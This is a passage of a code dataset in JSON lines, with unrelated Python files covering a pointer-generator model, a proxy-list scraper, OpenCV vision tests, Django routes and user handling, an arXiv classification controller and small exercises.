拼接后公式的左半部分完成了\r\n # _vocab_dists_extended (batch_size, dec_len, vocab_size+batch_oov_len)\r\n _vocab_dists_extended = tf.concat([_vocab_dists_pgn, _extra_zeros], axis=-1)\r\n\r\n # 公式右半部分\r\n # 乘以权重后的注意力\r\n # _attn_dists_pgn (batch_size, dec_len, enc_len)\r\n _attn_dists_pgn = attn_dists * (1 - p_gens)\r\n # 拓展后的长度\r\n _extended_vocab_size = vocab_size + batch_oov_len\r\n\r\n # 要更新的数组 _attn_dists_pgn\r\n # 更新之后数组的形状与 公式左半部分一致\r\n # shape=[batch_size, dec_len, vocab_size+batch_oov_len]\r\n shape = _vocab_dists_extended.shape\r\n\r\n enc_len = tf.shape(_enc_batch_extend_vocab)[1]\r\n dec_len = tf.shape(_vocab_dists_extended)[1]\r\n\r\n # batch_nums (batch_size, )\r\n batch_nums = tf.range(0, limit=batch_size)\r\n # batch_nums (batch_size, 1)\r\n batch_nums = 
tf.expand_dims(batch_nums, 1)\r\n # batch_nums (batch_size, 1, 1)\r\n batch_nums = tf.expand_dims(batch_nums, 2)\r\n\r\n # tile 在第1,2个维度上分别复制batch_nums dec_len,enc_len次\r\n # batch_nums (batch_size, dec_len, enc_len)\r\n batch_nums = tf.tile(batch_nums, [1, dec_len, enc_len])\r\n # (dec_len, )\r\n dec_len_nums = tf.range(0, limit=dec_len)\r\n # (1, dec_len)\r\n dec_len_nums = tf.expand_dims(dec_len_nums, 0)\r\n # (1, dec_len, 1)\r\n dec_len_nums = tf.expand_dims(dec_len_nums, 2)\r\n # tile是用来在不同维度上复制张量的\r\n # dec_len_nums (batch_size, dec_len, enc_len)\r\n dec_len_nums = tf.tile(dec_len_nums, [batch_size, 1, enc_len])\r\n # _enc_batch_extend_vocab_expand (batch_size, 1, enc_len)\r\n _enc_batch_extend_vocab_expand = tf.expand_dims(_enc_batch_extend_vocab, 1)\r\n # _enc_batch_extend_vocab_expand (batch_size, dec_len, enc_len)\r\n _enc_batch_extend_vocab_expand = tf.tile(_enc_batch_extend_vocab_expand, [1, dec_len, 1])\r\n\r\n # 因为要scatter到一个3D tensor上,所以最后一维是3\r\n # indices (batch_size, dec_len, enc_len, 3)\r\n indices = tf.stack((batch_nums, dec_len_nums, _enc_batch_extend_vocab_expand), axis=3)\r\n # 开始更新\r\n attn_dists_projected = tf.scatter_nd(indices, _attn_dists_pgn, shape)\r\n # 至此完成了公式的右半边\r\n # 计算最终分布\r\n final_dists = _vocab_dists_extended + attn_dists_projected\r\n return final_dists\r\n","sub_path":"PGN_remodel/PGN_model.py","file_name":"PGN_model.py","file_ext":"py","file_size_in_byte":7978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"595631617","text":"lista_numeros = []\nwhile True:\n valor = str(input('Digite um valor: '))\n if valor in lista_numeros:\n print('Valor duplicado! Não vou adicionar...')\n else:\n lista_numeros.append(valor)\n print('Valor adicionado com sucesso...')\n quer_continuar = ' '\n while quer_continuar not in 'SN':\n quer_continuar = str(input('Quer continuar [S/N]? 
')).strip().upper()[0]\n if quer_continuar == 'N':\n break\nprint('-=-' * 15)\nprint('Voce digitou os valores: ', end='')\nlista_numeros.sort()\nfor valor in lista_numeros:\n print(valor, end=' ')\nprint()\n","sub_path":"Modulo - 3/Exercícios/ex079.py","file_name":"ex079.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"552009890","text":"# -*- coding:utf-8 -*-\nimport random\nimport re\nfrom lxml import etree\n\nimport requests\nfrom bs4 import BeautifulSoup\nimport subprocess as sp\n\n\nclass Proxys(object):\n def __init__(self, page=1):\n # requests的Session可以自动保持cookie,不需要自己维护cookie内容\n self.S = requests.Session()\n # 西祠代理高匿IP地址\n self.target_url = 'http://www.xicidaili.com/nn/%d' % page\n # 完善的headers\n self.target_headers = {\n 'Upgrade-Insecure-Requests': '1',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',\n 'Referer': 'http://www.xicidaili.com/nn/',\n 'Accept-Encoding': 'gzip, deflate, sdch',\n 'Accept-Language': 'zh-CN,zh;q=0.9'\n }\n\n \"\"\"\n 函数说明:获取IP代理\n Parameters:\n page - 高匿代理页数,默认获取第一页\n Returns:\n proxys_list - 代理列表\n Modify:\n 2018-01-31\n \"\"\"\n\n def get_proxys(self):\n try:\n # get请求\n target_response = self.S.get(url=self.target_url, headers=self.target_headers)\n # utf-8编码\n target_response.encoding = 'utf-8'\n # 获取网页信息\n target_html = target_response.text\n # 获取id为ip_list的table\n bf1_ip_list = BeautifulSoup(target_html, 'lxml')\n bf2_ip_list = BeautifulSoup(str(bf1_ip_list.find_all(id='ip_list')), 'lxml')\n ip_list_info = bf2_ip_list.table.contents\n # 存储代理的列表\n proxys_list = []\n # 爬取每个代理信息\n for index in range(len(ip_list_info)):\n if index % 2 == 1 and index != 1:\n dom = etree.HTML(str(ip_list_info[index]))\n ip = dom.xpath('//td[2]')\n port = dom.xpath('//td[3]')\n protocol = dom.xpath('//td[6]')\n proxys_list.append(protocol[0].text.lower() + '#' + ip[0].text + '#' + port[0].text)\n # 返回代理列表\n return proxys_list\n except AttributeError:\n return None\n\n \"\"\"\n 函数说明:检查代理IP的连通性\n Parameters:\n ip - 代理的ip地址\n lose_time - 匹配丢包数\n waste_time - 匹配平均时间\n Returns:\n average_time - 代理ip平均耗时\n Modify:\n 2018-01-31\n \"\"\"\n\n def check_ip(self, ip):\n # 命令 -n 要发送的回显请求数 -w 等待每次回复的超时时间(毫秒)\n cmd = 'ping -n 3 -w 3 %s'\n # 执行命令\n p = sp.Popen(cmd % ip, stdin=sp.PIPE, stdout=sp.PIPE, stderr=sp.PIPE, shell=True)\n # 获得返回结果并解码\n out = p.stdout.read().decode('gbk')\n # 丢包数,平均时间\n lose_time, waste_time = self.initpattern(out)\n print(lose_time, waste_time)\n # 当匹配到丢失包信息失败,默认为三次请求全部丢包,丢包数lose赋值为3\n if len(lose_time) == 0:\n lose = 3\n else:\n lose = int(lose_time[0])\n if lose > 2:\n return 1000\n else:\n if len(waste_time) == 0:\n return 1000\n else:\n average_time = int(waste_time[0])\n return average_time\n\n def initpattern(self, output):\n lose_time = re.compile(u'丢失 = (\\d+)', re.IGNORECASE).findall(output)\n waste_time = re.compile(u'平均 = (\\d+)ms', re.IGNORECASE).findall(output)\n return lose_time, waste_time\n\n def get_proxy(self):\n proxy_dicts = []\n proxys_list = self.get_proxys()\n # if len(proxys_list) > 0:\n try:\n while len(proxys_list) > 90:\n proxy = random.choice(proxys_list)\n split_proxy = proxy.split('#')\n ip = split_proxy[1]\n average_time = self.check_ip(ip)\n if average_time > 200:\n proxys_list.remove(proxy)\n print(ip + '连接超时,ip重新获取中')\n if average_time < 200:\n 
proxys_list.remove(proxy)\n proxy_dict = {split_proxy[0]: split_proxy[1] + ':' + split_proxy[2]}\n proxy_dicts.append(proxy_dict)\n print('使用代理:', proxy_dicts)\n # continue\n return proxy_dicts\n except Exception as e:\n print(proxy_dicts, e)\n return proxy_dicts\n\n\nif __name__ == '__main__':\n proxys = Proxys(2)\n proxys.get_proxy()\n","sub_path":"test/create_proxys.py","file_name":"create_proxys.py","file_ext":"py","file_size_in_byte":4782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"398459753","text":"import pyrealsense2 as rs\nimport numpy as np\nimport cv2\n\n\"\"\"#Depth and color streams\npipeline = rs.pipeline()\nconfig = rs.config()\nconfig.enable_stream(rs.stream.depth, 1280, 720, rs.format.z16, 30) #enable_stream(source, width, height, format, fps)\nconfig.enable_stream(rs.stream.color, 1280, 720, rs.format.bgr8, 30) #Intel resources say 1280 & 720 is best for the depth calculations, then you want to downsize it later)\npipeline.start(config)\n\"\"\"\n\n# Initial Lower HSV threshold values(To be tuned later)\nlh = 0\nls = 0\nlv = 0\n\n# Initial Upper HSV threshold values (to be tunes later)\nuh = 180\nus = 255\nuv = 255\n\n#Empty coefficients list for first run\ncoefficients = []\n\nclass Threshold_manager:\n def __init__(self, lh, ls, lv, uh, us, uv):\n self.threshold_low = (lh,ls,lv)\n self.threshold_high = (uh,us,uv)\n\n def get_low(self):\n return self.threshold_low\n\n def get_high(self):\n return self.threshold_high\n\nclass Threshold_manager_debug:\n def __init__(self):\n self.lh = 22\n self.uh = 68\n self.ls = 53\n self.us = 107\n self.lv = 114\n self.uv = 254\n\n def on_low_H_thresh_trackbar(self, val):\n self.lh = val\n def on_high_H_thresh_trackbar(self, val):\n self.uh = val\n def on_low_S_thresh_trackbar(self, val):\n self.ls = val\n def on_high_S_thresh_trackbar(self, val):\n self.us = val\n def on_low_V_thresh_trackbar(self, val):\n self.lv = val\n def on_high_V_thresh_trackbar(self, val):\n self.uv = val\n\n def get_low(self):\n return (self.lh, self.ls, self.lv)\n def get_high(self):\n return (self.uh, self.us, self.uv)\n\nthreshold_values = Threshold_manager(lh, ls, lv, uh, us, uv)\ndebug = True\nif debug:\n import matplotlib.pyplot as plt\n threshold_values = Threshold_manager_debug()\n cv2.namedWindow(\"Threshold\")\n\n cv2.createTrackbar(\"low hue\", \"Threshold\", 0, 180, threshold_values.on_low_H_thresh_trackbar)\n cv2.createTrackbar(\"high hue\", \"Threshold\", 0, 180, threshold_values.on_high_H_thresh_trackbar)\n cv2.createTrackbar(\"low sat\", \"Threshold\", 0, 255, threshold_values.on_low_S_thresh_trackbar)\n cv2.createTrackbar(\"high sat\", \"Threshold\", 0, 255, threshold_values.on_high_S_thresh_trackbar)\n cv2.createTrackbar(\"low val\", \"Threshold\", 0, 255, threshold_values.on_low_V_thresh_trackbar)\n cv2.createTrackbar(\"high val\", \"Threshold\", 0, 255, threshold_values.on_high_V_thresh_trackbar)\n\n\n#In a dodgy try/catch so on exit (i.e. 
Ctrl-C) will still run the pipeline.close()\ntry:\n while True:\n #Wait for a coherent pair of depth & color frames\n #According to internet (implement later), should make sure takes picture from left camera\n frames = pipeline.wait_for_frames()\n depth_frame = frames.get_depth_frame()\n color_frame = frames.get_color_frame()\n if not depth_frame or not color_frame:\n continue #(Yikes - at some point should probably time how long it takes to get frames, move it into it's own thread if it's IO heavy)\n\n #Convert images to numpy arrays and resize them\n depth_image = cv2.resize(np.asanyarray(depth_frame.get_data()), (640, 360), interpolation=cv2.INTER_NEAREST)\n color_image = cv2.resize(np.asanyarray(color_frame.get_data()), (640, 360), interpolation=cv2.INTER_NEAREST)\n \n #color_image = cv2.imread('camera.jpg',1)\n\n #Process image:\n #Convert from RGB to HSV & threshold\n hsv_image = cv2.cvtColor(color_image, cv2.COLOR_BGR2HSV)\n #threshold_image = cv2.inRange(hsv_image, threshold_values.get_low(), threshold_values.get_high())\n threshold_image = cv2.inRange(hsv_image, (20,22,83), (57,134,171))\n\n if debug:\n # create trackbars for Upper and Lower HSV\n\n font = cv2.FONT_HERSHEY_SIMPLEX\n\n cv2.imshow(\"Threshold\", threshold_image)\n cv2.imshow(\"Raw input\", color_image)\n edges = cv2.Canny(threshold_image, 100, 200)\n (_, contours, _) = cv2.findContours(edges, cv2.RETR_LIST, cv2.CHAIN_APPROX_NONE)\n #Filter contours\n final_contours = []\n for contour in contours:\n area = cv2.contourArea(contour)\n if area > 500 and area < 90000:\n perimeter = cv2.arcLength(contour, True)\n if perimeter > 200 and perimeter < 3000:\n #Is supposed to approximate the area, but just kinda makes everything go funny\n #approx_contour = cv2.approxPolyDP(contour, 0.01*perimeter, True)\n final_contours.append(contour)\n contour_image = cv2.drawContours(color_image, final_contours, -1, (255,255,0),2)\n cv2.imshow(\"CANNY\", edges)\n cv2.imshow(\"Contours\", contour_image)\n if len(final_contours) > 0:\n final_contours.sort(key=lambda x: cv2.contourArea(x), reverse=True)\n bins = [[] for x in range(10)]\n fraction = int(len(color_image)/10)\n for point in final_contours[0]:\n bins[int(point[0][1]/fraction)].append(point[0])\n midpoints = []\n for contour in bins:\n contour = np.array(contour, dtype=np.int32).reshape((-1,1,2))\n contour = cv2.convexHull(contour, False)\n contour_image = cv2.drawContours(color_image, [contour], -1, (255, 0, 255), 2)\n moments = cv2.moments(contour)\n if moments[\"m00\"] != 0:\n midpoints.append((int(moments[\"m10\"] / moments[\"m00\"]), int(moments[\"m01\"] / moments[\"m00\"])))\n for line in range(len(midpoints)-1):\n contour_image = cv2.line(contour_image, midpoints[line], midpoints[line+1], (0,255,255), 2)\n cv2.imshow(\"dfe\", contour_image)\n \"\"\"images = []\n for i in range(10):\n edges = cv2.Canny(np.array(threshold_image[fraction*i, fraction*(i+1)]), 100, 200)\n (_, contours, _) = cv2.findContours(edges, cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)\n cv2.imshow(\"{} canny\".format(i), edges)\n canny_output = cv2.drawContours(color_image[fraction*i:fraction*(i+1)], contours, -1, (255,255,0),10)\n cv2.imshow(\"{} section\".format(i), canny_output)\n images.append(canny_output)\n cv2.imshow('Contours', np.vstack(images))\"\"\"\n cv2.waitKey(1)\nfinally:\n #cv2.imwrite(\"camera.jpg\", color_image)\n 
pipeline.stop()\n","sub_path":"test-code/vision-sliding-box-test-camera.py","file_name":"vision-sliding-box-test-camera.py","file_ext":"py","file_size_in_byte":6624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"487551507","text":"from django.conf.urls import url\nfrom . import views\nfrom django.http import HttpResponse\nfrom django.views.generic import TemplateView\n\nurlpatterns = [\n url(r'^$', views.index),\n url(r'^about/', views.about),\n url(r'^analy/', views.analy),\n url(r'^integration/', views.integration),\n url(r'^market/', views.market),\n url(r'^track/', views.track),\n url(r'^careers/', views.careers),\n\turl(r'^google323523d1a2bbb38c\\.html$', lambda r: HttpResponse(\"google-site-verification: google323523d1a2bbb38c.html\", content_type=\"text/plain\")),\n\turl(r'^sitemap\\.xml$', TemplateView.as_view(template_name='sitemap.xml')),\n\turl(r'^index/', views.index, name='index'),\n]","sub_path":"elaapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"19934527","text":"# -*- coding: UTF-8 -*-\nfrom django.contrib.auth.models import User\nfrom django.db import IntegrityError\nfrom DeBar.classes import Text\nfrom DeBar.classes.cadastros.cargo import C_Cargo\nfrom DeBar.classes.cadastros.classecadastro import C_Cadastro\n\nfrom DeBar.classes.usuario.email import Email\nfrom DeBar.classes.usuario.nome import Nome\nfrom DeBar.classes.usuario.nomeusuario import NomeUsuario\nfrom DeBar.classes.usuario.senha import Senha\nfrom DeBar.models import Cargo\n\n\nclass C_User(C_Cadastro):\n\n def __init__(self, request, objeto, username, nome, email, senha, senharepetida = None, id =None):\n super(C_User, self).__init__(request, objeto, id)\n\n self.username = None\n self.nome = None\n self.senha = None\n self.email = None\n self.senhaRepetida = senharepetida\n\n\n if not self.isvalido:\n self.setUsername(username)\n\n if self.username.isvalido:\n self.objeto = User.objects.create_user(self.username.valor)\n\n self.setNome(nome)\n self.setEmail(email)\n self.setSenha(senha, senharepetida)\n\n\n############################################################################################################\n############################################################################################################\n def setUsername(self, username):\n\n if isinstance(username, NomeUsuario):\n self.username = username\n else:\n self.username = NomeUsuario(username)\n\n try:\n teste = User.objects.get(username=self.username.valor)\n self.username.mensagem = Text().usuario_mesmo_username()\n self.username.isvalido = False\n except:\n self.objeto.username = self.username.valor\n self.valida()\n\n\n############################################################################################################\n############################################################################################################\n\n def setNome(self, nome):\n\n if isinstance(nome, Nome):\n\n self.nome = nome\n\n else:\n self.nome = Nome(nome)\n\n if self.nome.isvalido:\n self.objeto.first_name = self.nome.nome\n self.objeto.last_name = self.nome.sobrenome\n\n self.valida()\n\n############################################################################################################\n############################################################################################################\n\n def setSenha(self, senha, 
senhaRepetida):\n\n if isinstance(senha, Senha):\n self.senha = senha\n else:\n self.senha = Senha(senha, senhaRepetida)\n\n if self.senha.isvalido:\n self.objeto.password = self.senha.valor\n\n self.valida()\n\n############################################################################################################\n############################################################################################################\n\n def setEmail(self, email):\n\n if isinstance(email, Email):\n self.email = email\n else:\n self.email = Email(email)\n\n if self.email.isvalido:\n self.objeto.email = self.email.valor\n\n self.valida()\n############################################################################################################\n############################################################################################################\n\n def valida(self):\n\n try:\n if self.username.isvalido:\n if self.nome.isvalido:\n if self.senha.isvalido:\n if self.email.isvalido:\n self.isvalido = True\n else:\n self.mensagem = self.email.mensagem\n return False\n else:\n self.mensagem = self.senha.mensagem\n return False\n else:\n self.mensagem = self.nome.mensagem\n return False\n else:\n self.mensagem = self.username.mensagem\n return False\n\n except:\n return False\n\n############################################################################################################\n############################################################################################################\n\n def toJson(self):\n\n dict = super(C_User, self).toJson()\n\n if self.nome:\n dict.update({'nome': self.nome.toJson()})\n else:\n dict.update({'nome': self.objeto.first_name + \" \" + self.objeto.last_name})\n\n if self.username:\n dict.update({'username': self.username.toJson()})\n else:\n dict.update({'username': self.objeto.username})\n\n if self.senha:\n dict.update({'senha': self.senha.toJson()})\n else:\n dict.update({'senha': self.objeto.password})\n\n\n if self.email:\n dict.update({'email': self.email.toJson()})\n else:\n dict.update({'email': self.objeto.email})\n\n dict.update({'isvalido': self.isvalido})\n\n try:\n dict.update({'senhaRepetida': self.senha.senhaRepetida})\n except:\n pass\n\n return dict\n\n############################################################################################################\n############################################################################################################\n\n def ativar(self):\n\n if self.objeto.is_active:\n self.objeto.is_active = False\n else:\n self.objeto.is_active = True\n############################################################################################################\n############################################################################################################\n\n def save(self):\n\n try:\n self.objeto.set_password(self.senha.valor)\n self.objeto.save()\n\n except IntegrityError:\n self.mensagem = Text().usuario_mesmo_username()\n\n except:\n self.mensagem = Text().erro_banco_criar_usuario()\n\n############################################################################################################\n############################################################################################################\n\n def delete(self):\n\n self.objeto.delete()","sub_path":"DeBar/classes/usuario/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":6583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} 
+{"seq_id":"319600943","text":"\"\"\"\nController for classification actinos.\n\nCreates an event of type `core.events.event.SetPrimaryClassification`\nCreates an event of type `core.events.event.AddSecondaryClassification`\n\"\"\"\nfrom typing import Tuple, Dict, Any, List, Optional\nfrom werkzeug import MultiDict\nfrom werkzeug.exceptions import InternalServerError\nfrom flask import url_for\nfrom wtforms import SelectField, widgets, HiddenField, validators\n\nfrom arxiv import status, taxonomy\nfrom arxiv.forms import csrf\nfrom arxiv.base import logging\nfrom arxiv.users.domain import Session\nimport arxiv.submission as events\nfrom ..domain import SubmissionStage\nfrom ..util import load_submission\nfrom . import util\n\n# from arxiv-submission-core.events.event import ConfirmContactInformation\n\nlogger = logging.getLogger(__name__) # pylint: disable=C0103\n\nResponse = Tuple[Dict[str, Any], int, Dict[str, Any]] # pylint: disable=C0103\n\n\nclass ClassificationForm(csrf.CSRFForm):\n \"\"\"Form for classification selection.\"\"\"\n\n CATEGORIES = [\n (archive['name'], [\n (category_id, f\"{category['name']} ({category_id})\")\n for category_id, category in taxonomy.CATEGORIES_ACTIVE.items()\n if category['in_archive'] == archive_id\n ])\n for archive_id, archive in taxonomy.ARCHIVES_ACTIVE.items()\n ]\n \"\"\"Categories grouped by archive.\"\"\"\n\n ADD = 'add'\n REMOVE = 'remove'\n OPERATIONS = [\n (ADD, 'Add'),\n (REMOVE, 'Remove')\n ]\n operation = HiddenField(default=ADD, validators=[validators.optional()])\n category = util.OptGroupSelectField('Category', choices=CATEGORIES,\n default='')\n\n def filter_choices(self, submission: events.domain.Submission,\n session: Session, allowed: Optional[List[str]] = None) \\\n -> None:\n \"\"\"Remove redundant choices, and limit to endorsed categories.\"\"\"\n selected = self.category.data\n primary = submission.primary_classification\n\n choices = [\n (archive, [\n (category, display) for category, display in archive_choices\n if ((allowed is None or category in allowed)\n and (primary is None or category != primary.category)\n and category not in submission.secondary_categories)\n or category == selected\n ])\n for archive, archive_choices in self.category.choices\n ]\n self.category.choices = [\n (archive, _choices) for archive, _choices in choices\n if len(_choices) > 0\n ]\n\n @classmethod\n def formset(cls, submission: events.domain.Submission) \\\n -> Dict[str, 'ClassificationForm']:\n \"\"\"Generate a set of forms used to remove cross-list categories.\"\"\"\n formset = {}\n if hasattr(submission, 'secondary_classification') and \\\n submission.secondary_classification:\n for secondary in submission.secondary_classification:\n this_category = str(secondary.category)\n subform = cls(operation=cls.REMOVE, category=this_category)\n subform.category.widget = widgets.HiddenInput()\n formset[secondary.category] = subform\n return formset\n\n\ndef _data_from_submission(params: MultiDict,\n submission: events.domain.Submission) -> MultiDict:\n if submission.primary_classification \\\n and submission.primary_classification.category:\n params['category'] = submission.primary_classification.category\n return params\n\n\ndef classification(method: str, params: MultiDict, session: Session,\n submission_id: int) -> Response:\n \"\"\"Generate a `SetPrimaryClassification` event.\"\"\"\n submitter, client = util.user_and_client_from_session(session)\n\n # Will raise NotFound if there is no such submission.\n submission, submission_events = 
load_submission(submission_id)\n\n # The form should be prepopulated based on the current state of the\n # submission.\n if method == 'GET':\n params = _data_from_submission(params, submission)\n if 'category' not in params:\n params['category'] = session.user.profile.default_category.compound\n\n params['operation'] = ClassificationForm.ADD # Always add a primary.\n\n form = ClassificationForm(params)\n # We want categories in dot-delimited \"compound\" format.\n\n form.filter_choices(submission, session, submitter.endorsements)\n response_data = {\n 'submission_id': submission_id,\n 'form': form,\n 'submission': submission,\n 'submitter': submitter\n }\n\n if method == 'POST':\n if form.validate():\n logger.debug('Form is valid, with data: %s', str(form.data))\n category = form.category.data\n\n # If already selected, nothing more to do.\n if not submission.primary_classification \\\n or submission.primary_classification.category != category:\n try:\n logger.debug('Setting new primary: %s', category)\n # Create SetLicense event\n submission, stack = events.save( # pylint: disable=W0612\n events.SetPrimaryClassification(creator=submitter,\n category=category),\n submission_id=submission_id\n )\n except events.exceptions.InvalidStack as e:\n logger.error('Could not set primary: %s', str(e))\n form.errors # Causes the form to initialize errors.\n form._errors['events'] = [ie.message for ie\n in e.event_exceptions]\n logger.debug('InvalidStack; return bad request')\n return response_data, status.HTTP_400_BAD_REQUEST, {}\n except events.exceptions.SaveError as e:\n logger.error('Could not save primary event')\n raise InternalServerError(\n 'There was a problem saving this operation'\n ) from e\n else: # Form data were invalid.\n logger.debug('Invalid form data; return bad request')\n return response_data, status.HTTP_400_BAD_REQUEST, {}\n if params.get('action') in ['previous', 'save_exit', 'next']:\n logger.debug('Redirect to %s', params.get('action'))\n return response_data, status.HTTP_303_SEE_OTHER, {}\n logger.debug('Nothing to do, return 200')\n return response_data, status.HTTP_200_OK, {}\n\n\ndef cross_list(method: str, params: MultiDict, session: Session,\n submission_id: int) -> Response:\n \"\"\"Generate an `AddSecondaryClassification` event.\"\"\"\n submitter, client = util.user_and_client_from_session(session)\n\n # Will raise NotFound if there is no such submission.\n submission, submission_events = load_submission(submission_id)\n\n # We need forms for existing secondaries, to generate removal requests.\n formset = ClassificationForm.formset(submission)\n\n # This form handles additions and removals.\n form = ClassificationForm(params)\n form.operation._value = lambda: form.operation.data\n form.filter_choices(submission, session)\n _primary = taxonomy.CATEGORIES[submission.primary_classification.category]\n response_data = {\n 'submission_id': submission_id,\n 'form': form,\n 'formset': formset,\n 'primary': {\n 'id': submission.primary_classification.category,\n 'name': _primary['name']\n },\n\n }\n action = params.get('action')\n\n if method == 'POST':\n # Since the interface provides an \"add\" button to add cross-list\n # categories, we only want to handle the form data if the user is not\n # attempting to move to a different step.\n if not action:\n if form.validate():\n logger.debug('Form is valid, with data: %s', str(form.data))\n category = form.category.data\n operation = form.operation.data\n try:\n if operation == ClassificationForm.REMOVE:\n submission, _ = 
events.save( # pylint: disable=W0612\n events.RemoveSecondaryClassification(\n creator=submitter,\n category=category\n ),\n submission_id=submission_id\n )\n elif operation == ClassificationForm.ADD:\n submission, _ = events.save( # pylint: disable=W0612\n events.AddSecondaryClassification(\n creator=submitter,\n category=category\n ),\n submission_id=submission_id\n )\n except events.exceptions.InvalidStack as e:\n logger.error('Could not add secondary: %s', str(e))\n form.errors # Causes the form to initialize errors.\n form._errors['events'] = [ie.message for ie\n in e.event_exceptions]\n logger.debug('InvalidStack; return bad request')\n return response_data, status.HTTP_400_BAD_REQUEST, {}\n except events.exceptions.SaveError as e:\n logger.error('Could not save primary event')\n raise InternalServerError(\n 'There was a problem saving this operation'\n ) from e\n\n # Re-build the formset, to reflect changes that we just made.\n response_data['formset'] = \\\n ClassificationForm.formset(submission)\n # We want a fresh form here, since the POSTed data should now\n # be reflected in the formset.\n form = ClassificationForm()\n form.operation._value = lambda: form.operation.data\n form.filter_choices(submission, session)\n response_data['form'] = form\n\n else: # Form data were invalid.\n logger.debug('Invalid form data; return bad request')\n return response_data, status.HTTP_400_BAD_REQUEST, {}\n\n if action in ['previous', 'save_exit', 'next']:\n logger.debug('Redirect to %s', params.get('action'))\n return response_data, status.HTTP_303_SEE_OTHER, {}\n logger.debug('Nothing to do, return 200')\n return response_data, status.HTTP_200_OK, {}\n","sub_path":"submit/controllers/classification.py","file_name":"classification.py","file_ext":"py","file_size_in_byte":10767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"403671976","text":"# Тут лежат функции, поставляющие какие-то данные. 
Допустим, запрос на получение юзера из БД\nimport os\nfrom typing import Optional\nfrom base.provider import BaseProvider\nfrom .schemas import User, Coach, Reviews\n\n\nclass Provider(BaseProvider):\n def __init__(self):\n super().__init__('user')\n\n def get_user_id(self, steam_id: str) -> Optional[int]:\n user_id = self.exec_by_file('get_user_id.tmpl', {'steam_id': steam_id})\n return user_id[0].get('id') if user_id else None\n\n def get_user(self, user_id: int) -> dict:\n user_info = self.exec_by_file('get_user.tmpl', {'id': user_id})[0]\n user_info['le_pararms'] = {}\n if user_info.get('reviews_learner'):\n rating = []\n sociability = []\n adequacy = []\n qualification = []\n for record in user_info.get('reviews_learner'):\n rating.append(record.get('rating'))\n sociability.append(record.get('sociability'))\n adequacy.append(record.get('adequacy'))\n qualification.append(record.get('qualification'))\n user_info['le_pararms']['rating'] = sum(rating) / len(rating) if rating else None\n user_info['le_pararms']['sociability'] = sum(sociability) / len(sociability) if sociability else None\n user_info['le_pararms']['adequacy'] = sum(adequacy) / len(adequacy) if adequacy else None\n user_info['le_pararms']['qualification'] = sum(qualification) / len(qualification) if qualification else None\n else:\n user_info['le_pararms']['rating'] = None\n user_info['le_pararms']['sociability'] = None\n user_info['le_pararms']['adequacy'] = None\n user_info['le_pararms']['qualification'] = None\n user_info['co_pararms'] = {}\n if user_info.get('reviews_coach'):\n rating = []\n sociability = []\n adequacy = []\n qualification = []\n for record in user_info.get('reviews_coach'):\n rating.append(record.get('rating'))\n sociability.append(record.get('sociability'))\n adequacy.append(record.get('adequacy'))\n qualification.append(record.get('qualification'))\n user_info['co_pararms']['rating'] = sum(rating)/len(rating) if rating else None\n user_info['co_pararms']['sociability'] = sum(sociability) / len(sociability) if sociability else None\n user_info['co_pararms']['adequacy'] = sum(adequacy) / len(adequacy) if adequacy else None\n user_info['co_pararms']['qualification'] = sum(qualification) / len(qualification) if qualification else None\n else:\n user_info['co_pararms']['rating'] = None\n user_info['co_pararms']['sociability'] = None\n user_info['co_pararms']['adequacy'] = None\n user_info['co_pararms']['qualification'] = None\n return user_info\n\n def add_user(self, user_dict: dict) -> int:\n return self.exec_by_file('add_user.tmpl', user_dict)[0].get('id')\n\n def change_user(self, user_dict: User) -> dict:\n self.exec_by_file('change_user.tmpl', user_dict.dict())\n if user_dict.dict().get('games_user') is not None:\n for game in user_dict.dict().get('games_user'):\n self.exec_by_file('user_games.tmpl', game)\n if user_dict.dict().get('reviews_learner') is not None:\n for review in user_dict.dict().get('reviews_learner'):\n self.exec_by_file('reviews_learner.tmpl', review)\n if user_dict.dict().get('reviews_coach') is not None:\n for review in user_dict.dict().get('reviews_coach'):\n self.exec_by_file('reviews_coach.tmpl', review)\n if user_dict.dict().get('learners_learner') is not None:\n for review in user_dict.dict().get('learners_learner'):\n self.exec_by_file('learners.tmpl', review)\n if user_dict.dict().get('learners_coach') is not None:\n for review in user_dict.dict().get('learners_coach'):\n self.exec_by_file('learners.tmpl', review)\n return user_dict.dict()\n\n def get_coach(self, 
coach_dict: Coach) -> list:\n coach = self.exec_by_file('get_coach.tmpl', coach_dict.dict())\n if coach_dict.dict().get('id_game') is not None:\n id_game = coach_dict.dict().get('id_game')\n coach = list(filter(lambda x: x.get('id_game') == id_game, coach))\n coach = sorted(coach, key=lambda x: x.get('rating'), reverse=True)\n return coach\n\n def set_reviews(self, reviews_dict: Reviews) -> None:\n status = self.exec_by_file('get_learns.tmpl', reviews_dict.dict())\n if status:\n self.exec_by_file('set_reviews.tmpl', reviews_dict.dict())\n","sub_path":"web/apps/user/provider.py","file_name":"provider.py","file_ext":"py","file_size_in_byte":4886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"358152012","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jun 30 14:50:05 2018\n\n@author: ankit\n\"\"\"\n# Importing the libraries\nimport numpy as np\n#%matplotlib inline\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\nclass Algorithms():\n def __init__(self):\n pass\n\n def pca_compute(self, X_train, X_test, i):\n # Applying PCA\n from sklearn.decomposition import PCA\n pca = PCA(n_components = i)\n X_train = pca.fit_transform(X_train)\n X_test = pca.transform(X_test)\n\n return 